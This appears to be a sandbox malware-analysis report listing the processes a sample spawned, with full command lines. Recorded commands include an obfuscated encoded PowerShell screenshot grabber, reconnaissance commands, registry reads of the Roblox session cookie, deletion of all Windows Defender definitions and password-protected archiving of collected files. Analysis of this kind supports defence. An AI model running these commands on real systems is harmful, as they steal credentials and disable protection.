Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	05:00:11
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	05:00:11
Start date:	10/01/2025
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff7cab30000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	05:00:11
Start date:	10/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6bec80000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	05:00:12
Start date:	10/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	05:00:12
Start date:	10/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	05:00:13
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7952, Parent PID: 7792

General

Target ID:	51
Start time:	05:00:13
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	05:00:14
Start date:	10/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6bec80000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	05:00:14
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7688, Parent PID: 7572

General

Target ID:	54
Start time:	05:00:15
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	05:00:15
Start date:	10/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6bec80000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	05:00:15
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	05:00:15
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	05:00:15
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline"
Imagebase:	0x7ff7f9860000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	05:00:15
Start date:	10/01/2025
Path:	C:\Windows\System32\getmac.exe
Wow64 process (32bit):	false
Commandline:	getmac
Imagebase:	0x7ff6869b0000
File size:	90'112 bytes
MD5 hash:	7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	05:00:15
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8156, Parent PID: 7424

General

Target ID:	61
Start time:	05:00:15
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	05:00:15
Start date:	10/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6bec80000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	05:00:16
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF5CD.tmp" "c:\Users\user\AppData\Local\Temp\c4gv4hox\CSCF22C8917EB0C431F96BD8AEEEA495758.TMP"
Imagebase:	0x7ff735c70000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	05:00:17
Start date:	10/01/2025
Path:	C:\Windows\System32\SIHClient.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\sihclient.exe /cv g+FHZVRhzUydp9rkwD8VSQ.0.2
Imagebase:	0x7ff7ec580000
File size:	380'720 bytes
MD5 hash:	8BE47315BF30475EEECE8E39599E9273
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	05:00:17
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8164, Parent PID: 7764

General

Target ID:	66
Start time:	05:00:17
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	05:00:17
Start date:	10/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6bec80000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	05:00:17
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	05:00:17
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	05:00:17
Start date:	10/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	05:00:19
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	05:00:19
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	05:00:19
Start date:	10/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	05:00:24
Start date:	10/01/2025
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase:	0x7ff709920000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	05:00:31
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	05:00:31
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	05:00:31
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *
Imagebase:	0x7ff754240000
File size:	630'736 bytes
MD5 hash:	9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	05:00:33
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	05:00:33
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	05:00:33
